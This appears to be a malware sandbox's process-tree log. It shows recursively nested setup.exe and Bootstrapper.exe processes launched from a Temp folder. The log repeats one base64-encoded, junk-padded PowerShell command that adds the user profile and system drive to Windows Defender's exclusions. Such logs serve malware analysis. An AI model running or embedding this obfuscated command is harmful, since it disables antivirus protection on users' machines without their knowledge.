        PID:1516
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        59⤵
        
        PID:756
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        59⤵
        
        PID:1604
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        60⤵
        
        PID:6064
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        60⤵
        
        PID:6032
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        61⤵
        
        PID:6536
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        61⤵
        
        PID:7904
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        62⤵
        
        PID:5228
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        62⤵
        
        PID:5828
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        63⤵
        
        PID:4248
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        63⤵
        
        PID:8128
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        64⤵
        
        PID:6276
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        64⤵
        
        PID:5960
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        65⤵
        
        PID:5548
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        65⤵
        
        PID:5220
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        66⤵
        
        PID:7936
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        66⤵
        
        PID:6260
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        67⤵
        
        PID:4028
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        67⤵
        
        PID:6736
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        68⤵
        
        PID:5932
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        68⤵
        
        PID:6052
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        69⤵
        
        PID:6716
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        69⤵
        
        PID:3668
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        70⤵
        
        PID:1048
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        70⤵
        
        PID:6252
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        71⤵
        
        PID:6712
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        71⤵
        
        PID:5348
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        72⤵
        
        PID:6432
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        72⤵
        
        PID:1396
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        73⤵
        
        PID:1852
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        73⤵
        
        PID:5420
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        74⤵
        
        PID:1508
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        74⤵
        
        PID:2008
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        75⤵
        
        PID:7688
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        75⤵
        
        PID:5620
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        76⤵
        
        PID:7796
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        76⤵
        
        PID:7780
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        77⤵
        
        PID:7904
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        77⤵
        
        PID:6052
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        78⤵
        
        PID:5420
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        78⤵
        
        PID:7544
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        79⤵
        
        PID:6092
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        79⤵
        
        PID:5908
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        78⤵
        
        PID:7448
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        77⤵
        
        PID:6872
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        76⤵
        
        PID:4284
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        75⤵
        
        PID:7116
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        74⤵
        
        PID:6384
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        73⤵
        
        PID:3420
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        72⤵
        
        PID:3940
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        69⤵
        
        PID:5872
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        68⤵
        
        PID:5704
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        67⤵
        
        PID:5160
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        66⤵
        
        PID:6316
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        65⤵
        
        PID:1276
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        64⤵
        
        PID:6016
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        63⤵
        
        PID:1400
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        62⤵
        
        PID:6736
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        61⤵
        
        PID:1016
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        60⤵
        
        PID:3420
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        59⤵
        
        PID:5684
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        58⤵
        
        PID:4356
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        57⤵
        
        PID:3308
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        56⤵
        
        PID:4028
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        55⤵
        
        PID:4092
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        54⤵
        
        PID:3328
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        53⤵
        
        PID:3200
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        52⤵
        
        PID:7528
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        51⤵
        
        PID:7936
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        50⤵
        
        PID:7612
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        49⤵
        
        PID:3472
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        48⤵
        
        PID:7644
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        47⤵
        
        PID:4852
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        46⤵
        
        PID:4456
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        45⤵
        
        PID:4820
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        44⤵
        
        PID:1324
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        43⤵
        
        PID:7512
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        42⤵
        
        PID:6724
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        41⤵
        
        PID:7908
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        40⤵
        
        PID:7644
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        39⤵
        
        PID:7424
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        38⤵
        
        PID:6824
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        37⤵
        
        PID:7084
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        36⤵
        
        PID:6288
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        35⤵
        
        PID:6864
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        34⤵
        
        PID:5832
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        33⤵
        
        PID:6236
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        32⤵
        
        PID:7100
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        31⤵
        
        PID:6884
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        30⤵
        
        PID:6720
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        29⤵
        
        PID:6396
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        28⤵
        
        PID:6156
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        27⤵
        
        PID:6132
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        26⤵
        
        PID:5472
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        25⤵
        
        PID:3416
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        24⤵
        
        PID:5568
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        23⤵
        
        PID:2220
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        22⤵
        
        PID:5964
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        21⤵
        
        PID:5676
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        20⤵
        
        PID:5440
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        19⤵
        
        PID:5252
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        18⤵
        
        PID:4204
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        17⤵
        
        PID:4028
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        16⤵
        
        PID:924
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        15⤵
        
        PID:5116
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        14⤵
        
        PID:2012
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        13⤵
        
        PID:3196
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        12⤵
        
        PID:3668
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        11⤵
        
        PID:1048
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        10⤵
        
        PID:1100
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        9⤵
        
        PID:4956
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        8⤵
        
        PID:2736
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        7⤵
        
        PID:3948
      - C:\Users\Admin\AppData\Local\Temp\setup.exe
